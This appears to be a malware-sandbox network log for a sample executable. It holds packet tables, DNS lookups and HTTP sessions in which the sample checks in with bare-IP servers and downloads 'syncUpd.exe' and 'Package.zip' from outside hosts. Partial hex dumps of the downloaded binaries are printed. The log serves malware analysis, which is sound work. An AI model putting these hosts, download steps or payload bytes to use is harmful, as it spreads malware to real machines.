Apr 25, 2024 09:04:02.289253950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289268970 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289288044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289319992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289320946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289366007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289382935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289395094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289469004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289508104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289508104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289508104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289525986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289572001 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289602995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289614916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289664984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289668083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289736032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289747953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289764881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289766073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289782047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289813995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289844036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289855957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289892912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289897919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289933920 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289963961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289997101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290040016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290040016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290067911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290091038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290102959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290131092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290160894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290194035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290195942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290241003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290261984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290297031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290306091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290354013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290373087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290402889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290402889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290415049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290450096 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290481091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290551901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290606976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290612936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290637016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290649891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290683985 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290699005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290746927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290754080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290788889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290811062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290848017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290868998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290913105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290942907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.290973902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290973902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.290992022 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291006088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291054010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291065931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291105986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291107893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291142941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291160107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291172981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291227102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291239023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291243076 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291273117 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291297913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291304111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291410923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291413069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291423082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291445017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291470051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291479111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291490078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291554928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.291558981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.291635990 CEST	49733	80	192.168.2.4	176.97.76.106

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 09:03:59.391366005 CEST	192.168.2.4	1.1.1.1	0x5386	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 09:04:09.964881897 CEST	192.168.2.4	1.1.1.1	0xad2e	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 09:04:15.443955898 CEST	192.168.2.4	1.1.1.1	0x37c	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false
Apr 25, 2024 09:04:39.035950899 CEST	192.168.2.4	1.1.1.1	0x1813	Standard query (0)	westus2-2.in.applicationinsights.azure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 09:03:59.866235018 CEST	1.1.1.1	192.168.2.4	0x5386	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 25, 2024 09:04:10.077796936 CEST	1.1.1.1	192.168.2.4	0xad2e	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 25, 2024 09:04:11.587528944 CEST	1.1.1.1	192.168.2.4	0xf2e9	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 09:04:11.587528944 CEST	1.1.1.1	192.168.2.4	0xf2e9	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 25, 2024 09:04:15.572724104 CEST	1.1.1.1	192.168.2.4	0x37c	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 09:04:15.572724104 CEST	1.1.1.1	192.168.2.4	0x37c	No error (0)	iolo0.b-cdn.net		169.150.236.97	A (IP address)	IN (0x0001)	false
Apr 25, 2024 09:04:39.262132883 CEST	1.1.1.1	192.168.2.4	0x1813	No error (0)	westus2-2.in.applicationinsights.azure.com	westus2-2.in.ai.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 09:04:39.262132883 CEST	1.1.1.1	192.168.2.4	0x1813	No error (0)	westus2-2.in.ai.monitor.azure.com	westus2-2.in.ai.privatelink.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 09:04:39.262132883 CEST	1.1.1.1	192.168.2.4	0x1813	No error (0)	westus2-2.in.ai.privatelink.monitor.azure.com	gig-ai-prod-westus2-0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.172.128.90	80	5288	C:\Users\user\Desktop\g77dRQ1Csm.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:03:55.326591969 CEST	205	OUT	GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 09:03:57.090905905 CEST	148	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:03:55 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 31 Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.172.128.228	80	5288	C:\Users\user\Desktop\g77dRQ1Csm.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:03:57.312439919 CEST	191	OUT	GET /ping.php?substr=five HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 09:03:57.523858070 CEST	147	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:03:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.172.128.59	80	5288	C:\Users\user\Desktop\g77dRQ1Csm.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:03:57.741254091 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 09:03:57.949142933 CEST	1289	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:03:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 25 Apr 2024 07:00:02 GMT ETag: "44200-616e6560d4ed7" Accept-Ranges: bytes Content-Length: 279040 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 8e a8 0b d1 ef c6 58 d1 ef c6 58 d1 ef c6 58 cf bd 53 58 c0 ef c6 58 cf bd 45 58 b2 ef c6 58 cf bd 42 58 fb ef c6 58 f6 29 bd 58 d4 ef c6 58 d1 ef c7 58 bb ef c6 58 cf bd 4c 58 d0 ef c6 58 cf bd 52 58 d0 ef c6 58 cf bd 57 58 d0 ef c6 58 52 69 63 68 d1 ef c6 58 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a1 22 4f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 00 00 00 16 82 02 00 00 00 00 4c 16 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 82 02 00 04 00 00 b1 d4 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 42 03 00 3c 00 00 00 00 80 81 02 68 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b3 a6 00 00 00 10 00 00 00 a8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc 8a 02 00 00 c0 00 00 00 8c 02 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 22 7e 02 00 50 03 00 00 28 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 e0 00 00 00 80 81 02 00 e2 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 c4 c1 40 00 e9 75 02 00 00 cc cc Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XXXSXXEXXBXX)XXXXLXXRXXWXXRichXPEL"OdL@pLB<hx.text `.rdata@@.data"~P(8@.rsrch`@@@u
Apr 25, 2024 09:03:57.949219942 CEST	1289	IN	Data Raw: cc cc cc 56 8b f1 c7 06 c4 c1 40 00 e8 62 02 00 00 f6 44 24 08 01 74 09 56 e8 9e 03 00 00 83 c4 04 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 51 8b 46 0c 85 c0 74 1a 8b 0c 24 57 8b 7e 10 51 e8 7b 00 00 00 8b 56 0c 52 e8 6b 03 00 00 83 Data Ascii: V@bD$tV^QFt$W~Q{VRk_PFFFJQ1YQ!YD$VPf@^V;t-~rFP3FFfN
Apr 25, 2024 09:03:57.949265003 CEST	1289	IN	Data Raw: 18 00 40 00 75 19 83 b8 74 00 40 00 0e 76 10 33 c9 39 b0 e8 00 40 00 0f 95 c1 89 4d e4 eb 03 89 75 e4 33 db 43 53 e8 7f 3c 00 00 59 85 c0 75 08 6a 1c e8 58 ff ff ff 59 e8 e0 3a 00 00 85 c0 75 08 6a 10 e8 47 ff ff ff 59 e8 73 36 00 00 89 5d fc e8 Data Ascii: @ut@v39@Mu3CS<YujXY:ujGYs6]4}j(Y\|@b2mC1}j(Yv/}j(YSw)Y;tP(Y.]tMjYQPVh@E9uuP*+}5EMPQP-
Apr 25, 2024 09:03:57.949311018 CEST	1289	IN	Data Raw: 45 fc 5f 5e 5b c9 c3 8b ff 55 8b ec 8b 45 0c 56 8b 75 08 89 06 e8 b1 34 00 00 8b 80 98 00 00 00 89 46 04 e8 a3 34 00 00 89 b0 98 00 00 00 8b c6 5e 5d c3 8b ff 55 8b ec e8 8e 34 00 00 8b 80 98 00 00 00 eb 0a 8b 08 3b 4d 08 74 0a 8b 40 04 85 c0 75 Data Ascii: E_^[UEVu4F4^]U4;Mt@u@]3]UVf4u;uV4N^]E4H;txu^]DNHU0PCeM3MEEEE@E@MEdEEdu
Apr 25, 2024 09:03:57.949445963 CEST	1289	IN	Data Raw: 5c 1f 40 00 64 1f 40 00 77 1f 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 Data Ascii: \@d@w@DDDDDDDDDDDDDD$@@@@@E^_FGE^_IFGFGE^_FGFGFGE^_UEqC]U(0PC3ESjLjP(
Apr 25, 2024 09:03:57.949493885 CEST	1289	IN	Data Raw: e8 3e fd ff ff 83 38 2a 75 0f 8b cf b0 3f e8 64 ff ff ff 83 7d 08 00 7f d5 5e 5b 5d c3 8b ff 55 8b ec 81 ec 78 02 00 00 a1 30 50 43 00 33 c5 89 45 fc 53 8b 5d 0c 56 8b 75 08 33 c0 57 8b 7d 14 ff 75 10 8d 8d a4 fd ff ff 89 b5 b4 fd ff ff 89 bd dc Data Ascii: >8*u?d}^[]Ux0PC3ES]Vu3W}ulu53PPPPP<t`pF@u^VGY UCttQA
Apr 25, 2024 09:03:57.949538946 CEST	1289	IN	Data Raw: 58 0f 84 da 02 00 00 48 48 74 79 2b c1 0f 84 27 ff ff ff 48 48 0f 85 9e 04 00 00 83 c7 04 f7 85 f0 fd ff ff 10 08 00 00 89 bd dc fd ff ff 74 30 0f b7 47 fc 50 68 00 02 00 00 8d 85 f4 fd ff ff 50 8d 85 e0 fd ff ff 50 e8 d6 4f 00 00 83 c4 10 85 c0 Data Ascii: XHHty+'HHt0GPhPPOtG5;t;H;t4t+QCPGYp
Apr 25, 2024 09:03:57.949587107 CEST	1289	IN	Data Raw: 9d e0 fd ff ff 2b 9d d0 fd ff ff f6 85 f0 fd ff ff 0c 75 17 ff b5 b4 fd ff ff 8d 85 d8 fd ff ff 53 6a 20 e8 70 f5 ff ff 83 c4 0c ff b5 d0 fd ff ff 8b bd b4 fd ff ff 8d 85 d8 fd ff ff 8d 8d d4 fd ff ff e8 76 f5 ff ff f6 85 f0 fd ff ff 08 59 74 1b Data Ascii: +uSj pvYtuWSj0.tf~bPjEPFPFpJu(9t MYuP
Apr 25, 2024 09:03:57.949631929 CEST	1289	IN	Data Raw: 04 56 89 35 c0 62 c1 02 e8 fe 43 00 00 59 59 a3 b8 52 c1 02 85 c0 75 05 6a 1a 58 5e c3 33 d2 b9 b8 51 43 00 eb 05 a1 b8 52 c1 02 89 0c 02 83 c1 20 83 c2 04 81 f9 38 54 43 00 7c ea 6a fe 5e 33 d2 b9 c8 51 43 00 57 8b c2 c1 f8 05 8b 04 85 a0 51 c1 Data Ascii: V5bCYYRujX^3QCR 8TC\|j^3QCWQt;tu1 B(RC\|_3^W=HqCtUU5RYUVuQC;r"TCw+Q'JNY V@^]UE}PI
Apr 25, 2024 09:03:57.949656963 CEST	1289	IN	Data Raw: 00 00 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 83 f9 08 72 2a f3 a5 ff 24 95 84 39 40 00 90 8b c7 ba 03 00 00 00 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 98 38 40 00 ff 24 8d 94 39 40 00 90 ff 24 8d 18 39 40 00 90 a8 38 40 00 d4 38 40 00 f8 38 40 Data Ascii: ur*$9@r$8@$9@$9@8@8@8@#FGFGr$9@I#FGr$9@#r$9@I{9@h9@`9@X9@P9@H9@@9@89@DDDD
Apr 25, 2024 09:03:58.157120943 CEST	1289	IN	Data Raw: 00 33 c0 5e c3 6a 0c 68 48 3d 43 00 e8 29 f8 ff ff e8 65 01 00 00 83 65 fc 00 ff 75 08 e8 f8 fe ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 45 f8 ff ff c3 e8 44 01 00 00 c3 8b ff 55 8b ec ff 75 08 e8 b7 ff ff ff f7 d8 1b c0 Data Ascii: 3^jhH=C)eeuYEEEEDUuYH]UEqC]U5qCYtuYt3@]3]UE8csmu*xu$@= t=!t="t=@u!3]h=@@3UWW@u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	176.97.76.106	80	5288	C:\Users\user\Desktop\g77dRQ1Csm.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:04:00.106939077 CEST	185	OUT	GET /1/Package.zip HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 09:04:00.345608950 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Apr 2024 06:48:51 GMT Content-Type: application/zip Content-Length: 3884863 Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT Connection: keep-alive ETag: "66289c8a-3b473f" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec 84 e0 32 28 87 9a 39 6a c5 df 17 d5 9c fd f8 21 c1 24 f7 ea 96 9c 3c 3c 0f 86 c4 8d da 50 23 62 d7 15 4c 6a a1 44 97 76 47 c4 2b b4 7d af 54 82 03 36 74 52 d5 17 62 d9 22 e9 c4 9b 6f 84 66 a5 87 ef 68 3e cd 2a b9 86 e7 ac 89 1a fa c7 99 5a 0f 1d 35 99 28 dd d7 19 f0 5d a4 8f a2 90 d9 1c a7 e0 a5 Data Ascii: PK?XIbunch.dat\]: "TN<wfX 